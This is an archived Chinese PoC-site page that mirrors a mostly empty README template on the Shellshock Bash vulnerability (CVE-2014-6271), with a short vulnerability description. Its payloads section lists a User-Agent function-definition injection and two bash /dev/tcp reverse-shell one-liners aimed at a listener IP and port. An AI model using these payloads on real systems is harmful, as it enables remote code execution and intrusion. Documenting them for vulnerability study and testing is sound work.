关联漏洞
标题:
GNU Bash 远程代码执行漏洞
(CVE-2014-6271)
描述:GNU Bash是美国软件开发者布莱恩-福克斯(Brian J. Fox)为GNU计划而编写的一个Shell(命令语言解释器),它运行于类Unix操作系统中(Linux系统的默认Shell),并能够从标准输入设备或文件中读取、执行命令,同时也结合了一部分ksh和csh的特点。 GNU Bash 4.3及之前版本中存在安全漏洞,该漏洞源于程序没有正确处理环境变量值内的函数定义。远程攻击者可借助特制的环境变量利用该漏洞执行任意代码。以下产品和模块可能会被利用:OpenSSH sshd中的ForceComman
描述
*CVE-2014-6271* Unix Arbitrary Code Execution Exploit commonly know as Shell Shock. Examples, Docs, Incident Response and Vulnerability/Risk Assessment, and Additional Resources may be dumped here. Enjoy :) --- somhmxxghoul ---
介绍
# **Shell Shock**
***Author(s)**: *ghoul@omhm.org*
***Maintainer(s)**: **
***Department**: *DevOps*
***License(s)**: **
## Overview
***Shell Shock***: Privelege Escalation, Remote Code Execution
Family of bugs in the Unix Bash Shell. Allow execution of arbitrary commands.
### Exploitation Vectors
* ****
#### *Payloads*
* shellshock user agent = User-Agent: () { :; } ; <$BASH_COMMAND>
* rshell payload = bash -i >& /dev/tcp/127.0.0.1
- rshell redirect to listener = bash -i >& /dev/tcp/$YOUR_IP:$PORT
#### Tricks
*
## **Design**:
* *Purpose*:
* *Contents*:
* *Server(s)*:
* *Application*:
* *Database*:
* *Networking*:
* *DNS*:
* *Routes*:
* *Application Dependencies*:
* *Dependant Programs*:
## **Basic Usage**:
* *Usage*:
* *Common Use Cases*:
* *Examples*:
## *Testing*
### *Test Input*
* *Parameters*:
* *Actions*:
### Test Output
* *Output*:
* *Screenshots*:
* *Video*:
* *Etc*:
## Notes:* *[option]*:
文件快照
[4.0K] /data/pocs/051b292033f8dc8fcb08e3fe6d2aba4780949619
└── [ 935] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。